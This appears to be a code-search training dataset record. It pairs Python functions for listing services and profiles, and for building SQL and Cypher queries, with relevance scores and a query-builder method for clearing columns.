"def list_services(ctx):\n pass",
"def get_services(self): \n if self._access_token is None:\n raise RequiresAccessTokenError()\n\n response = self.__make_oauth_request(ADD_URLS_FOR_SERVICES_URL, token=self._access_token, signed=True)\n return simplejson.loads(response.read()).keys()",
"def get_services(self):\r\n return get_service_list()",
"async def api_get_services(g: WalletTypeInfo = Depends(get_key_type)):\n user = await get_user(g.wallet.user)\n wallet_ids = user.wallet_ids if user else []\n services = []\n for wallet_id in wallet_ids:\n new_services = await get_services(wallet_id)\n services += new_services if new_services else []\n return [service.dict() for service in services] if services else []",
"def get(self):\n return UserServices.get_all()",
"def getAllServices(self) -> List[ghidra.framework.plugintool.ServiceInterfaceImplementationPair]:\n ...",
"def get_services(self):\n\n return list(self.services.values())",
"def list_profiles(self, params):\n return self.profiles",
"def services(self):\n return self.agent.http.get(\n lambda x: json.loads(x.body), '/v1/agent/services')",
"def all_services(self):\n services = oc.all_service_names()\n for s in services:\n print(s)\n print(\"#total\", len(services))",
"def list_services(self, **kwargs: Optional[Any]) -> list:\n\n self.logger.debug(\"list_services: %s\", kwargs)\n\n namespace = kwargs.get(\"namespace\", \"global\")\n\n return self.AD.services.list_services(namespace) # retrieve services",
"def get_all_profiles(store=\"local\"):\n return {\n \"Domain Profile\": get_all_settings(profile=\"domain\", store=store),\n \"Private Profile\": get_all_settings(profile=\"private\", store=store),\n \"Public Profile\": get_all_settings(profile=\"public\", store=store),\n }",
"def get_services_list(self, services):\n if not services:\n return []\n\n return [service[\"StackServices\"][\"service_name\"] for service in services[\"services\"]]",
"def fetch_all(profile):\n params = {}\n params[\"profile\"] = profile\n response = utils.do_request(instanceprofile, \"get\", params)\n data = utils.get_data(\"InstanceProfiles\", response)\n return data",
"def get_services(self):\n services = []\n for f in dir(self):\n o = getattr(self, f)\n if callable(o) and hasattr(o, '_service_name'):\n services.append(getattr(o, '_service_name'))\n return services",
"def getServices(self):\n pass",
"def available_services():\n all_datas = ()\n data = ()\n\n for class_path in settings.TH_SERVICES:\n class_name = class_path.rsplit('.', 1)[1]\n # 2nd array position contains the name of the service\n data = (class_name, class_name.rsplit('Service', 1)[1])\n all_datas = (data,) + all_datas\n return all_datas",
"def available_services(self) -> list[str]:\r\n return self.services",
"def services(request):\n\n services = Service.objects.all()\n creator_profile = UserProfile.objects.all()\n\n template = 'services/services.html'\n context = {\n 'services': services,\n 'creator_profile': creator_profile,\n }\n\n return render(request, template, context)",
"def selectable_services():\n\n db = current.db\n s3db = current.s3db\n\n stable = s3db.org_service\n query = (stable.deleted == False)\n rows = db(query).select(stable.id,\n stable.name,\n )\n services = {row.id: row.name for row in rows}\n return services",
"def get_profiles(self):\n profiles = [['Profile name', 'GUID']]\n r = self.system_cursor.execute('{Call wtGetProfileList()}')\n for row in r.fetchall():\n profiles.append([row.PROFILE_NAME, row.PROFILE_GUID])\n return profiles",
"def getServices(self):\n catalog = plone.api.portal.get_tool('portal_catalog')\n path = '{}/catalog'.format('/'.join(plone.api.portal.get().getPhysicalPath()))\n query = dict(portal_type='Service', sort_on='sortable_title', path=path)\n result = list()\n for brain in catalog(**query):\n result.append((brain.getId, brain.Title))\n return result",
"def get_all_profiles(self) -> List[Profile]:\n return [self.model.parse_obj(profile) for profile in self.read_records(SyncMode.full_refresh)]",
"def list(conn):\n try:\n return conn.get(url='/auth-providers')['providers']\n except SystemError as e:\n raise e",
"def profiles(self):\n if not self._profiles:\n self.GetAllProfiles()\n return self._profiles",
"def get_services(self):\n ret = self.v1_service_list.get()\n services = {each.metadata.namespace: each.metadata.name for each in ret.items}\n\n return services",
"def service_accounts(self) -> Sequence[str]:\n return pulumi.get(self, \"service_accounts\")",
"def retrieve_services(account):\n uri = \"https://api.pagerduty.com/services\"\n headers = {\n 'Content-Type': 'application/json',\n 'Authorization': 'Token token=' + account.api_access_key,\n 'Accept': 'application/vnd.pagerduty+json;version=2'\n }\n json_root = 'services'\n timeout_seconds = 10\n params = {'include[]': 'integrations', 'sort_by': 'name:desc'}\n all_services = _invoke_pagerduty_resource_api(uri, headers, json_root, params, timeout_seconds)\n\n services = []\n for svcDict in all_services:\n if (_valid_service(svcDict)):\n integration = _get_zenoss_integration(svcDict)\n if integration == False:\n continue\n\n service = Service(name=svcDict['name'],\n id=svcDict['id'],\n type=svcDict['type'],\n service_key=integration['integration_key'])\n services.append(service)\n\n return services",
"def list_state_services(self, auth, context=None):\n return self._client.call_method(\n 'UserAndJobState.list_state_services',\n [auth], self._service_ver, context)"
] |
[
"0.73958594",
"0.6973076",
"0.67835885",
"0.6751856",
"0.6588541",
"0.655133",
"0.6544352",
"0.65439755",
"0.6432942",
"0.6429285",
"0.6399615",
"0.63925225",
"0.63810605",
"0.6370326",
"0.6329185",
"0.628808",
"0.62779367",
"0.62436295",
"0.6207708",
"0.61990726",
"0.619445",
"0.61748713",
"0.6172009",
"0.6143339",
"0.61232847",
"0.6122378",
"0.60490793",
"0.602947",
"0.6023793",
"0.60198194"
] |
0.86264575
|
0
|
Remove any columns specified. The default columns for any query are the id of the token and the label of the type.
|
def clear_columns(self):
self._columns = []
return self
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _delete_null_columns(self):\r\n ds = DeleteStatement(self.column_family_name)\r\n deleted_fields = False\r\n for _, v in self.instance._values.items():\r\n col = v.column\r\n if v.deleted:\r\n ds.add_field(col.db_field_name)\r\n deleted_fields = True\r\n elif isinstance(col, Map):\r\n uc = MapDeleteClause(col.db_field_name, v.value, v.previous_value)\r\n if uc.get_context_size() > 0:\r\n ds.add_field(uc)\r\n deleted_fields = True\r\n\r\n if deleted_fields:\r\n for name, col in self.model._primary_keys.items():\r\n ds.add_where_clause(WhereClause(\r\n col.db_field_name,\r\n EqualsOperator(),\r\n col.to_database(getattr(self.instance, name))\r\n ))\r\n self._execute(ds)",
"def test_remove_columns(self):\n table = Table('table1', key=['col1', 'col2'])[\n Column('col1'),\n Column('col2'),\n Column('col3'),\n Column('col4'),\n ]\n\n table.remove_columns(('col2', 'col3'))\n\n self.assertEqual(2, len(table.columns))\n self.assertEqual('col1', table.columns[0].name)\n self.assertEqual('col4', table.columns[1].name)\n self.assertEqual([], table.key)",
"def _delcolumns(self, columnname, columndata=\"\"):\n\n del self[columnname]",
"def drop_unnecessary_columns(df):\n df = df.drop([\n 'id',\n 'imdb_id',\n 'poster_path',\n 'video',\n 'status',\n 'weighted_rating', # Only average_rating was used for this project\n 'original_title',\n 'crew', # Used in production_score\n 'producers', # Used in production_score\n 'executive_producers', # Used in production_score\n 'cast', # Used in production_score\n 'director', # Used in production_score\n 'production_companies', # Used in production_score\n 'production_countries', # Binarized\n 'genres', # Binarized\n 'original_language', # Binarized\n 'adult', # No adult movies in the dataset, so no variance between movies\n 'release_date', # Not being considered for this project\n 'overview',\n 'title',\n 'tagline',\n 'vote_average', # Ratings have been binned\n 'popularity', # Only considering average_rating\n 'vote_count', # We are making a predictor, so it makes no sense to use vote counts as input\n 'revenue', # We are making a predictor, so it makes no sense to use revenue as input\n 'keywords', # Not considering keywords for this project\n 'revenue_divide_budget', # We are making a predictor, so it makes no sense to use revenue/budget as input\n ], 1)\n return df",
"def drop_cols(df, cols=['EMP_S', 'FIRMPDEMP_S', 'GEO_ID', 'GEO_TTL', 'MSA',\n 'PAYANN_S', 'RCPPDEMP_S', 'ST', 'YEAR', 'YIBSZFI',\n 'YIBSZFI_TTL', 'us', 'Unnamed: 0']):\n df = df.drop(columns=cols)\n return df",
"def _drop_columns_step(self, op: data_algebra.data_ops_types.OperatorPlatform, *, data_map: Dict[str, Any]):\n res = self._compose_polars_ops(op.sources[0], data_map=data_map)\n res = res.select(op.columns_produced())\n return res",
"def get_cols_drop():",
"def remove_urequired_columns(self, unrequired_columns):\n self.df = self.df.drop(columns=unrequired_columns)",
"def drop(self, columns: List[str]):\n self._check_columns(columns)\n return self._fromdata(\n {\n self.dtype.fields[i].name: ColumnFromVelox.from_velox(\n self.device,\n self.dtype.fields[i].dtype,\n self._data.child_at(i),\n True,\n )\n for i in range(self._data.children_size())\n if self.dtype.fields[i].name not in columns\n },\n self._mask,\n )",
"def _remove_redundant_columns(self):\n self.dataframe.drop(['letter', 'sentiment'], axis=1, inplace=True)",
"def clear(self):\n cols = list(self.info.columns.keys())\n for col_name in cols:\n if col_name == DEFAULT_COLUMN_NAME:\n continue\n self.clear_column(col_name)\n\n self.info.clear_files()",
"def drop_columns(self, columns):\n dframe = self.dframe(keep_parent_ids=True)\n self.replace_observations(dframe.drop(columns, axis=1))",
"def _drop_fields(usecols, dtype, dropcols):\n for col in dropcols:\n try:\n usecols.remove(col)\n except ValueError:\n pass\n try:\n del dtype[col]\n except KeyError:\n pass\n return usecols, dtype",
"def remove_data():\n # Removing the existing data\n col_answer_given.remove()\n col_answer_not_given.remove()\n col_q_not_given.remove()\n col_to_summarize.remove()",
"def drop_columns(self, col):\n try:\n self.cleaned_data.drop(col, axis=1, inplace=True)\n except Exception as e:\n raise e",
"def delete_columns(self, columns):\n columns = to_list(columns)\n\n unknown = set(columns) - set(self._columns)\n if unknown:\n names = \", \".join(str(name) for name in unknown)\n raise ValueError(f\"Unable to remove unknown columns: {names}\")\n\n for column in columns:\n col = self.column_location(column)\n for idx in self.index:\n del self._data[idx][col]\n del self._columns[col]",
"def drop_extra_columns(self):\n table = self.data.loc[:, self._required_columns]\n return self.as_dataframe(table)",
"def remove_columns(df):\n avg = np.mean(df[df['sentiment'] != 'None']['sentiment'].astype('float'))\n df['sentiment'] = df['sentiment'].replace('None', avg).astype('float')\n\n to_remove = []\n print('column(s) removed: ')\n for column in df.columns:\n print(column)\n if(np.unique(df[column][df[column].notnull()]).shape[0] < 2):\n print(column)\n to_remove.append(column)\n \n return df.drop(columns = to_remove)",
"def remove_insertion_columns(self):\n cols = self.get_insertion_columns()\n s = []\n a = 0\n for b in cols:\n if b > a:\n s.append((a, b))\n a = b + 1\n s.append((a, len(self.col_labels)))\n for name, seq in list(self.items()):\n news = []\n for c in s:\n news.append(seq[c[0]:c[1]])\n self[name] = \"\".join(news)",
"def _drop_cols(self, duplicate_cols):\n self._hybrid_meta.drop(\n duplicate_cols + DROPPED_COLUMNS,\n axis=1, inplace=True, errors='ignore'\n )",
"def drop_id_columns(df):\n id_cols = get_id_columns(df)\n if len(id_cols) > 0:\n df = df.drop(id_cols, axis = 1)\n\n return df",
"def clear(self):\n for col in self.cols:\n self.data[col] = []\n return self",
"def preprocess(df):\n drop_cols = ['duration_ms', 'key', 'mode', 'time_signature', 'popularity', 'tempo']\n drop_cols += ['track_id', 'track_name', 'artist_name']\n for col in drop_cols:\n if col in list(df.columns):\n df = df.drop(columns=col)\n return df",
"def drop_cols(df, cols):\n df.drop(cols, axis=1, inplace=True)\n\n return df",
"def remove_columns(tx, header, columns_to_remove):\n print(\"\\nRemove columns...\")\n num_removed = 0\n for col in columns_to_remove:\n tx = np.delete(tx, col - num_removed, 1)\n header = np.delete(header, col - num_removed + 2)\n num_removed += 1\n print(\"\\n... finished.\")\n return tx, header",
"def remove_intermediate_columns(dataframe):\n\n combined_dataframe_dropped_cols = dataframe.drop(columns = ['measureland_qualifier_flag_speed',\n 'measureland_qualifier_flag_distance',\n 'measureland_qualifier_flag_acceleration',\n 'measureland_qualifier_flag_visual'])\n\n print(\"Dimensions of combined dataframe after dropping columns:\", combined_dataframe_dropped_cols.shape)\n print(\"Combined dataframe after dropping columns: \", combined_dataframe_dropped_cols.sample(10))\n\n return combined_dataframe_dropped_cols",
"def reset_columns(self):\n\n reset_cols = [i for i in self.__cols if i in self.__df_timings.columns]\n self.__df_timings = self.__df_timings.loc[:, reset_cols]\n return",
"def remove_columns(data, col_ids):\n return np.delete(data, col_ids, axis=1)",
"def remove_all_fields(self):\n self.fields = None",
"def delete_variable(self, columns):\n if not isinstance(columns, (list, tuple)):\n columns = [columns]\n for col in columns:\n if isinstance(col, str):\n col = [i for i, v in enumerate(self.list) if v.name == col][0]\n self.list.pop(col)"
] |
[
"0.6175713",
"0.6078552",
"0.6025119",
"0.60184366",
"0.60068727",
"0.59229934",
"0.5912904",
"0.5882896",
"0.58668727",
"0.58612",
"0.5853696",
"0.5852278",
"0.5851712",
"0.5823952",
"0.5740287",
"0.5717554",
"0.57098347",
"0.5708513",
"0.56833816",
"0.56809497",
"0.563553",
"0.5586917",
"0.55833614",
"0.55783653",
"0.55710983",
"0.5525263",
"0.55234903",
"0.5517471",
"0.5489227",
"0.54554176"
] |
0.65311384
|
0
|
Same as ``all``, but the results of the query are output to the specified path as a CSV file.
|
def to_csv(self, path):
results = self.all()
if self.stop_check is not None and self.stop_check():
return
results.to_csv(path)
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def to_csv(self, path):\n for table in ['datasets', 'dataruns', 'hyperpartitions', 'classifiers']:\n df = pd.read_sql('SELECT * FROM %s' % table, self.session.bind)\n df.to_csv(os.path.join(path, '%s.csv' % table), index=False)",
"def log_results(self, path):\n pd.DataFrame(self.results).to_csv(path)",
"def set_query_output(self, path):\n\n file = f'sql_query_R{str(self.time_span).replace(\".\", \"_\")} ({str(self.date_time).replace(\":\",\"_\")}).csv'\n self.query_output_file = path_inc(path, file)",
"def write_csv(self, directory = None):\n if ((directory is None) and\n (self._session.config.folder_basename is not None)):\n directory = self._session.results._full_path\n else:\n return\n \n file = CSV_file(self, directory)\n file.write()\n return file",
"def to_csv(self, dir_path, **kwargs):\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n\n for name, table in self.items():\n path = os.path.join(dir_path, '%s.csv' % name)\n\n table.to_csv(path, **kwargs)",
"def create_query_csv(self):\n\n self.query_df.to_csv(self.query_output_file)",
"def to_csv(self, path: pathlib.Path):\n combined = self.combined_df\n assert combined[CommonFields.LOCATION_ID].notna().all()\n common_df.write_csv(\n combined, path, structlog.get_logger(), [CommonFields.LOCATION_ID, CommonFields.DATE]\n )\n if self.provenance is not None:\n provenance_path = str(path).replace(\".csv\", \"-provenance.csv\")\n self.provenance.sort_index().to_csv(provenance_path)",
"def to_csv_files(self, path):\n self._to_dict_tree().to_csv_files(path)",
"def export_csv(self, outpath):\n\n\t\tself.df.to_csv(outpath)",
"def csv(self, destination_path):\n # todo - test for single and duplicate base cases\n to_csv(self._axl_data, destination_path)",
"def save_results(self, path):\n create_folder(path)\n self.get_scores().to_csv(path + r'/scores.csv', index=False)\n self.get_results().to_csv(path + r'/results.csv', index=False)\n self.get_pivot_last_epoch().to_csv(path + r'/pivot_last_epoch.csv', index=True)",
"def printCsv(self):\n self.printCsvHeader()\n for r in self._records:\n r.printCsv()",
"def export_results(path: str):\n _, ext = Utils.get_filename_ext(path)\n\n if ext not in [\".md\", \".json\", \".csv\"]:\n click.echo(\"Output file must be of type markdown, csv or json.\\n\", err=True)\n return\n\n with open(path, \"w+\") as out:\n Exporter.write(Format(Utils.format_to_int(ext)), out)\n\n click.echo(f\"Successfully exported results to {path}\\n\")",
"def save_dataset_csv(self, path):\n cols = list(self.data_dict.keys())\n df = pd.DataFrame(self.data_dict, index=None, columns=cols)\n df.to_csv(path, index=True)",
"def to_csv(self, out_folder):\n import pandas as pd\n\n df = pd.DataFrame(zip(self.results['cids'],\n self.results['differences'],\n self.results['experimental_values']),\n columns=['cids', 'differences',\n 'experimental_values'])\n df.to_csv(out_folder, index=False)",
"def export_table(path, path_out):\n table = rb.get_table(path)\n table.to_csv(path_out, index=False)\n return",
"def file(self):\n result = []\n completePath = CompletePath(self.path, self.filename) \n with open(completePath.path(), 'w', newline='') as csvfile:\n fieldnames = ['Activity', 'Points']\n writer = csv.DictWriter(csvfile, fieldnames = fieldnames)\n writer.writeheader()\n for i in range ( len( self.groupPriority.rows() ) ):\n tmp = self.groupPriority.rows()[i]\n self.log.info ( \"FinalCSV\", \"file\",\"data {0},{1}\".format( tmp.activity(), tmp.points() ) )\n writer.writerow({'Activity': tmp.activity(), 'Points': tmp.points()})\n self.log.info(\"FinalCSV\", \"file\", \"Elaborated file: {0}\".format ( completePath.path() ) )",
"def get_csv(self):\n all_csvs = [each for each in listdir(self.cur_dir) if each.endswith('.csv')]\n return all_csvs",
"def export_csv(self, path):\r\n\r\n with open(path, 'w') as f:\r\n f.write('# h,hr,m')\r\n\r\n if self.rho is not None:\r\n f.write(',rho')\r\n if self.temperature is not None:\r\n f.write(',temperature')\r\n\r\n f.write('\\n')\r\n for i in range(self.shape[0]):\r\n for j in range(self.shape[1]):\r\n f.write(f'{self.h[i, j]},{self.hr[i, j]},{self.m[i, j]}')\r\n if self.rho is not None:\r\n f.write(f',{self.rho[i, j]}')\r\n if self.temperature is not None:\r\n f.write(f',{self.temperature[i, j]}')\r\n f.write('\\n')\r\n return",
"def to_csv(self, path, sep=';', **kwargs):\n df = self.get_as_pandas_dataframe()\n df.to_csv(path, sep=sep, index=False, **kwargs)",
"def write_results(results):\n with RESULTS_PATH.open(\"w\") as writer:\n csvwriter = csv.writer(writer)\n csvwriter.writerows(results)",
"def to_csv(self, path):\n if os.path.isdir(path):\n shutil.rmtree(os.path.join(path))\n os.makedirs(path)\n\n for name, df in self.input_data.items():\n name += \".csv\"\n filename = os.path.join(path, name)\n df.to_csv(filename)\n logging.info(\"Scenario saved as csv-collection to %s\", path)",
"def generate_report(self, output_path):\n with open(output_path, 'w', newline='', encoding=\"utf-8\") as csv_fd:\n writer = csv.writer(csv_fd, quoting=csv.QUOTE_NONNUMERIC, doublequote=False, escapechar=\"\\\\\")\n writer.writerow([\"category\", \"level\", \"description\", \"method\", \"parameter\", \"url\", \"body\"])\n writer.writerows(self._vulns)\n writer.writerows(self._anomalies)\n writer.writerows(self._additionals)",
"def output_into_file(self, path: str):\n # Creating path if not exist\n Path(path).mkdir(parents=True, exist_ok=True)\n # Writing every day as a csv file\n for day in self:\n with open(f\"{path}/{day.name}.csv\", \"w\") as file:\n writer = csv.writer(file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n # First line / Title\n writer.writerow([\" \", day.name])\n for shift in day:\n employees = \", \".join([e.name for e in shift.employees])\n writer.writerow([f\"{shift.start}-{shift.end}\", employees])",
"def save_to_csv(self):\n path = partial(os.path.join, 'datasets')\n save_name = self.name.lower().replace(' ', '_')\n self.df['values'].sum(axis=1).to_csv(path('{0}_values.csv'.format(save_name)))\n self.df['allocations'].to_csv(path('{0}_allocations.csv'.format(save_name)))\n self.df['returns'].to_csv(path('{0}_returns.csv'.format(save_name)))\n self.trades.to_csv(path('{0}_trades.csv'.format(save_name)))",
"def _csv_export(self, exppath):\n with open(exppath, 'w') as csvfile:\n csvwriter = csv.writer(csvfile, delimiter=',', skipinitialspace=True)\n csvwriter.writerow(['hexstr','dmc','name'])\n for clr in self.lookup_table:\n csvwriter.writerow([clr.hex.to_str(), clr.id, clr.name])",
"def queryset_to_csv(self):\n csv_data = []\n custom_fields = []\n\n # Start with the column headers\n headers = self.queryset.model.csv_headers.copy()\n\n # Add custom field headers, if any\n if hasattr(self.queryset.model, 'get_custom_fields'):\n for custom_field in self.queryset.model().get_custom_fields():\n headers.append(custom_field.name)\n custom_fields.append(custom_field.name)\n\n csv_data.append(','.join(headers))\n\n # Iterate through the queryset appending each object\n for obj in self.queryset:\n data = obj.to_csv()\n\n for custom_field in custom_fields:\n data += (obj.cf.get(custom_field, ''),)\n\n csv_data.append(csv_format(data))\n\n return '\\n'.join(csv_data)",
"def export(self, queryset=None):\n self.queryset = queryset or self.queryset\n exported_datetime = get_utcnow()\n filename = self.get_filename(exported_datetime)\n path = os.path.join(self.export_folder, filename)\n with open(path, 'w') as f:\n csv_writer = csv.DictWriter(\n f, fieldnames=self.field_names, delimiter=self.delimiter)\n csv_writer.writeheader()\n for model_obj in self.queryset:\n object_helper = self.object_history_helper_cls(\n model_obj=model_obj, create=True)\n objects = object_helper.get_not_exported()\n for obj in objects:\n row = self.prepare_row(\n model_obj=model_obj,\n exported_datetime=exported_datetime,\n export_change_type=obj.export_change_type)\n csv_writer.writerow(row)\n object_helper.update_as_exported(\n objects=objects, exported_datetime=exported_datetime)\n file_history_updater = self.file_history_updater_cls(\n path=path,\n delimiter=self.delimiter,\n model=self.model_cls._meta.label_lower,\n filename=filename)\n file_history_updater.update()\n return path",
"def get_csv_in_path(self, path):\n files = os.listdir((path))\n return files",
"def get_all_files_to_instrument():\n sql=\"SELECT * FROM files\"\n conn=sqlite3.connect(CONNECTION_STRING)\n c=conn.cursor()\n c.execute(sql)\n results=c.fetchall()\n conn.close()\n return results"
] |
[
"0.72415906",
"0.714864",
"0.68289703",
"0.63184816",
"0.63152087",
"0.6263419",
"0.6259996",
"0.60712045",
"0.60492957",
"0.6011469",
"0.59969336",
"0.58934367",
"0.5839492",
"0.5837897",
"0.58354586",
"0.5821142",
"0.580053",
"0.578438",
"0.5771946",
"0.5771284",
"0.57213783",
"0.567657",
"0.5647735",
"0.55912113",
"0.5572885",
"0.5570379",
"0.5555601",
"0.55513686",
"0.5538678",
"0.5487247"
] |
0.7828584
|
0
|
Generates a Cypher statement based on the query.
|
def cypher(self):
kwargs = {'match': '',
'optional_match': '',
'where': '',
'with': '',
'return': ''}
# generate initial match strings
match_strings = set()
withs = set()
nodes = self.required_nodes()
for node in nodes:
if node.has_subquery:
continue
match_strings.add(node.for_match())
withs.update(node.withs)
kwargs['match'] = 'MATCH ' + ',\n'.join(match_strings)
# generate main filters
properties = []
for c in self._criterion:
if c.in_subquery:
continue
properties.append(c.for_cypher())
if properties:
kwargs['where'] += 'WHERE ' + '\nAND '.join(properties)
optional_nodes = self.optional_nodes()
optional_match_strings = []
for node in optional_nodes:
if node.has_subquery:
continue
optional_match_strings.append(node.for_match())
withs.update(node.withs)
if optional_match_strings:
s = ''
for i, o in enumerate(optional_match_strings):
s += 'OPTIONAL MATCH ' + o + '\n'
kwargs['optional_match'] = s
# generate subqueries
with_statements = ['WITH ' + ', '.join(withs)]
for node in nodes:
if not node.has_subquery:
continue
statement = node.subquery(withs, self._criterion)
with_statements.append(statement)
withs.update(node.withs)
for node in optional_nodes:
if not node.has_subquery:
continue
statement = node.subquery(withs, self._criterion, optional=True)
with_statements.append(statement)
withs.update(node.withs)
kwargs['with'] = '\n'.join(with_statements)
kwargs['return'] = self.generate_return()
cypher = self.query_template.format(**kwargs)
return cypher
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def _build_statement(self, query, query_key, beets_key):\n statement = \"\"\n if query_key in query:\n for query_string in query[query_key]:\n if '\"' in query_string:\n statement += \" and %s = \\'%s\\' \" % (beets_key,\n query_string)\n else:\n statement += ' and %s = \\\"%s\\\" ' % (beets_key,\n query_string)\n return statement",
"def gen_q_stmt(name, query):\n return \"query {} `{}`;\\n\".format(name, query)",
"def cypher(self, query):\n from neomodel import db\n try:\n results, meta = db.cypher_query(query)\n except Exception as e:\n raise Exception(\n \"Failed to execute Cypher Query: %s\\n%s\" % (query, str(e)))\n return False\n # log.debug(\"Graph query.\\nResults: %s\\nMeta: %s\" % (results, meta))\n return results",
"def Generate(self):\n clauses = [self.main_clause] + self.use_clauses + self.join_clauses\n if self.where_conds:\n if self.or_where_conds:\n clauses.append('WHERE ' + '\\n OR '.join(self.where_conds))\n else:\n clauses.append('WHERE ' + '\\n AND '.join(self.where_conds))\n if self.group_by_terms:\n clauses.append('GROUP BY ' + ', '.join(self.group_by_terms))\n if self.having_conds:\n assert self.group_by_terms\n clauses.append('HAVING %s' % ','.join(self.having_conds))\n if self.order_by_terms:\n clauses.append('ORDER BY ' + ', '.join(self.order_by_terms))\n\n if self.limit and self.offset:\n clauses.append('LIMIT %d OFFSET %d' % (self.limit, self.offset))\n elif self.limit:\n clauses.append('LIMIT %d' % self.limit)\n elif self.offset:\n clauses.append('LIMIT %d OFFSET %d' % (sys.maxint, self.offset))\n\n if self.insert_args:\n clauses.append('VALUES (' + PlaceHolders(self.insert_args[0]) + ')')\n args = self.insert_args\n if self.duplicate_update_cols:\n clauses.append('ON DUPLICATE KEY UPDATE %s' % (\n ', '.join(['%s=VALUES(%s)' % (col, col)\n for col in self.duplicate_update_cols])))\n assert not (self.join_args + self.update_args + self.where_args +\n self.group_by_args + self.order_by_args + self.having_args)\n else:\n args = (self.join_args + self.update_args + self.where_args +\n self.group_by_args + self.having_args + self.order_by_args)\n assert not (self.insert_args + self.duplicate_update_cols)\n\n args = _BoolsToInts(args)\n stmt_str = '\\n'.join(clause for clause in clauses if clause)\n\n assert _IsValidStatement(stmt_str), stmt_str\n return stmt_str, args",
"def run_cypher_query(self, query):\n with self._driver.session() as session:\n session.write_transaction(self.add_input_graph, query)",
"def generate_query(self):\n return",
"def print_query(query: Query) -> str:\n regex = re.compile(r\":(?P<name>\\w+)\")\n params = query.statement.compile().params\n sql = regex.sub(r\"'{\\g<name>}'\", str(query.statement)).format(**params)\n from flexmeasures.data.config import db\n\n print(f\"\\nPrinting SQLAlchemy query to database {db.engine.url.database}:\\n\\n\")\n print(sql)\n return sql",
"def cypher(self, query: str, **parameters: str) -> Any:\n\n try:\n # results, meta = db.cypher_query(query, parameters)\n results, _ = db.cypher_query(query, parameters)\n except CypherSyntaxError as e:\n log.warning(query)\n log.error(f\"Failed to execute Cypher Query\\n{e}\")\n raise CypherSyntaxError(\"Failed to execute Cypher Query\") from e\n return results",
"def gen_sql(runtime, query_type, target_model=None):\n\n from_table = runtime.model.table_name\n\n # if target_model not given, use from_table instead\n if target_model is None:\n target_model = runtime.model\n\n target_table = target_model.table_name\n\n data = runtime.data # alias\n\n # quick mark for parse time functions\n _where = Compiler.parse_where(data['where'])\n _set = Compiler.parse_set(data['set'])\n _orderby = Compiler.parse_orderby(data['orderby'])\n _select = Compiler.parse_select(data['select'])\n _limit = Compiler.parse_limit(data['limit'])\n _groupby = Compiler.parse_groupby(data['groupby'])\n _having = Compiler.parse_having(data['having'])\n _distinct = Compiler.parse_distinct(data['distinct'])\n\n pattern = Compiler.SQL_PATTERNS[query_type]\n\n SQL = pattern.format(**{\n 'target': target_table,\n 'set': _set,\n 'from': from_table,\n 'where': _where,\n 'select': _select,\n 'limit': _limit,\n 'orderby': _orderby,\n 'groupby': _groupby,\n 'having': _having,\n 'distinct': _distinct,\n })\n\n return SQL",
"def generate_query(schema):\n q = None\n if schema:\n q = \"CREATE SCHEMA\"\n if schema.if_not_exists:\n q = \"{} IF NOT EXISTS\".format(q)\n if schema.name:\n q = \"{} {}\".format(q, schema.name)\n if schema.authorization:\n q = \"{} AUTHORIZATION {}\".format(q, schema.authorization)\n return q",
"def _assemble(self):\n selectop = self._headopt and f'{self._headopt}' or ''\n select = f'{selectop} ' + ', '.join(self._head)\n froms = 'from ' + ', '.join(self._tables)\n joins = ' '.join(self._joins)\n wheres, wkw = self._build_where()\n\n order = ''\n if self._order:\n order = f'order by {self._order[0]} {self._order[1]}'\n limit = ''\n if self._limit:\n limit = f'limit {self._limit}'\n\n kw = self._kw.copy()\n kw.update(wkw)\n return (f'select {select} '\n f'{froms} '\n f'{joins} '\n f'{wheres} '\n f'{order} '\n f'{limit}'\n ), kw",
"def run_query(self, query: str) -> BoltStatementResult:\n with self.neo4j_driver.driver.session() as session:\n return session.run(query)",
"def to_sql(self):\n return self._grammar.compile_select(self)",
"def to_sql(self):\n\n if not self._action:\n self.set_action(\"select\")\n for scope in self._global_scopes.get(self.owner, {}).get(self._action, []):\n if not scope:\n continue\n\n scope(self.owner, self)\n\n grammar = self.get_grammar()\n sql = grammar.compile(self._action).to_sql()\n self.boot()\n return sql",
"def generate_select_sql(self, condition, fields):\n return \"SELECT %s FROM %s WHERE %s\" % (fields, self.tablename, condition)",
"def generate_sql(opts):\n base_select = BASE_SELECT[opts[\"source\"]]\n usage_structs = \",\".join(u.sql for u in USAGE_CRITERIA[opts[\"source\"]])\n usage_structs = indent(dedent(usage_structs), \" \")\n return TEMPLATE.format(**locals(), **opts)",
"def generate_dry_run_query(self) -> str:\n return self.connector.dry_run_query(self.traversal_node)",
"def construct_query(self):\n reader = QueryReader(filepath=self.filepath, filename=self.filename, raw_sql=self.raw_sql, params=self.params)\n return reader.sql",
"def _generate_stmt(self, n, add_indent=False):\n typ = type(n)\n if add_indent: self.indent_level += 2\n indent = self._make_indent()\n if add_indent: self.indent_level -= 2\n\n if typ in (\n c_ast.Decl, c_ast.Assignment, c_ast.Cast, c_ast.UnaryOp,\n c_ast.BinaryOp, c_ast.TernaryOp, c_ast.FuncCall, c_ast.ArrayRef,\n c_ast.StructRef, c_ast.Constant, c_ast.ID, c_ast.Typedef,\n c_ast.ExprList):\n # These can also appear in an expression context so no semicolon\n # is added to them automatically\n #\n # Only print out expression if they are part of slice\n if n.sliced:\n return indent + self.visit(n) + ';\\n'\n else:\n return indent + '{}\\n'\n elif typ in (c_ast.Compound,):\n # No extra indentation required before the opening brace of a\n # compound - because it consists of multiple lines it has to\n # compute its own indentation.\n #\n return self.visit(n)\n else:\n if n.sliced:\n return indent + self.visit(n) + '\\n'\n else:\n return ''",
"def sql(self):\n return ';\\n'.join([x.sql() for x in self._statements]) + ';'",
"def wrapGraph(self, query) :\n\t\tif self.graph :\n\t\t\treturn \" GRAPH <%s> { %s } \" % (self.graph, query)\n\t\telse :\n\t\t\treturn query",
"def construct_statement(*args):\n\n INPUT_STATEMENT = \"\"\n for statement in args:\n INPUT_STATEMENT += statement\n \n\n return INPUT_STATEMENT",
"def _select_query(self):\r\n if self._where:\r\n self._validate_select_where()\r\n return SelectStatement(\r\n self.column_family_name,\r\n fields=self._select_fields(),\r\n where=self._where,\r\n order_by=self._order,\r\n limit=self._limit,\r\n allow_filtering=self._allow_filtering\r\n )",
